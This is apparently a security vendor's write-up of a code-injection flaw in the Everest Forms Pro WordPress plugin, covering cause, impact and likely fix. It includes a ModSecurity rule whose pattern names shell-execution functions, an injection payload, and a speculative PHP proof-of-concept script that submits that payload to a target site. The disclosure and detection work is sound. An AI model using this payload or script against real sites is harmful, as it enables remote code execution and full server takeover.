Atomic Edge analysis of CVE-2026-3300 (metadata-based):
This vulnerability is an unauthenticated remote code execution flaw in the Everest Forms Pro WordPress plugin. The vulnerability exists in the Calculation Addon’s process_filter() function. Attackers can inject arbitrary PHP code via form field submissions when a form uses the “Complex Calculation” feature. The CVSS 9.8 score reflects the critical nature of this server-side code execution vulnerability.
Atomic Edge research identifies the root cause as improper neutralization of user input in a PHP code generation context (CWE-94). The process_filter() function concatenates user-controlled form field values directly into a PHP code string. This string is then passed to eval() for execution. The plugin applies sanitize_text_field() to input, but this WordPress function only sanitizes for database and display contexts. It does not escape single quotes or other characters significant in PHP code strings. The vulnerability description confirms these mechanics, though the exact code path cannot be verified without source access.
Exploitation requires a WordPress site with Everest Forms Pro version 1.9.12 or earlier installed. The site must have at least one form using the “Complex Calculation” feature. Attackers submit crafted values in any string-type form field (text, email, URL, select, radio). The payload is delivered via standard form submission, likely through POST requests to the frontend form handler. A typical payload would close the existing PHP string context and inject new code: ‘); phpinfo(); //. The injected code executes with the web server’s privileges when the calculation engine processes the form data.
The fix likely involves removing the eval() call entirely or implementing strict input validation. Proper remediation would replace dynamic code generation with a safe expression evaluator. Alternatively, the plugin could implement a whitelist of allowed mathematical operators and functions. The patched version 1.9.13 presumably addresses the issue by either sanitizing input for the PHP code context or removing the vulnerable code generation pattern.
Successful exploitation grants attackers arbitrary PHP code execution on the target server. This provides complete control over the WordPress installation and underlying server environment. Attackers can create administrative users, modify site content, steal sensitive data, install backdoors, or pivot to other systems on the network. The unauthenticated nature and network attack vector make this vulnerability particularly dangerous for publicly accessible WordPress sites.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-3300 (metadata-based)
# Targets Everest Forms Pro form submissions containing PHP code injection patterns
SecRule REQUEST_URI "@rx /wp-admin/admin-ajax.php$"
"id:1003300,phase:2,deny,status:403,chain,msg:'CVE-2026-3300: Everest Forms Pro RCE via Calculation Field',severity:'CRITICAL',tag:'CVE-2026-3300',tag:'WordPress',tag:'Plugin',tag:'Everest-Forms-Pro',tag:'RCE'"
SecRule ARGS_POST:action "@streq everest_forms_submit" "chain"
SecRule ARGS_POST "@rx \'\)[\s\S]*?phpinfo\(|\'\)[\s\S]*?system\(|\'\)[\s\S]*?exec\(|\'\)[\s\S]*?eval\(|\'\)[\s\S]*?passthru\(|\'\)[\s\S]*?shell_exec\("
"setvar:'tx.cve_2026_3300_score=+%{tx.critical_anomaly_score}',setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3300 - Everest Forms Pro <= 1.9.12 - Unauthenticated Remote Code Execution via Calculation Field
<?php
/**
* Proof of Concept for CVE-2026-3300
* Assumptions based on vulnerability description:
* 1. A form with "Complex Calculation" feature exists on the target site
* 2. The form contains at least one string-type field (text, email, URL, select, radio)
* 3. Form submissions are processed via standard WordPress form handling
* 4. The vulnerable process_filter() function executes during form processing
*/
$target_url = "https://example.com/"; // CHANGE THIS TO TARGET URL
// Payload to execute PHP code via eval() injection
// Closes the existing string context and injects phpinfo()
$payload = "'); phpinfo(); //";
// Prepare form submission data
// Field names would need to be discovered for the specific target form
$post_data = [
'everest_forms' => [
'form_id' => '1', // Assumed form ID - would need enumeration
'fields' => [
'text_field_1' => $payload, // Example text field
'email_field_1' => 'attacker@example.com', // Legitimate email
],
'action' => 'everest_forms_submit', // Common WordPress form handler action
],
'_wpnonce' => 'nonce_value_here', // Nonce may be required
];
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/x-www-form-urlencoded',
'User-Agent: Atomic Edge Research PoC',
]);
// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Check for successful exploitation
if (strpos($response, 'phpinfo()') !== false || strpos($response, 'PHP Version') !== false) {
echo "[+] Vulnerability likely exploited. PHP info found in response.n";
echo "[+] HTTP Status: $http_coden";
} else {
echo "[-] No clear indication of successful exploitation.n";
echo "[-] HTTP Status: $http_coden";
echo "[-] Response length: " . strlen($response) . " bytesn";
}
// Note: This PoC requires enumeration of:
// 1. Valid form ID
// 2. Correct field names
// 3. Working nonce (if required)
// 4. Form submission endpoint
?>
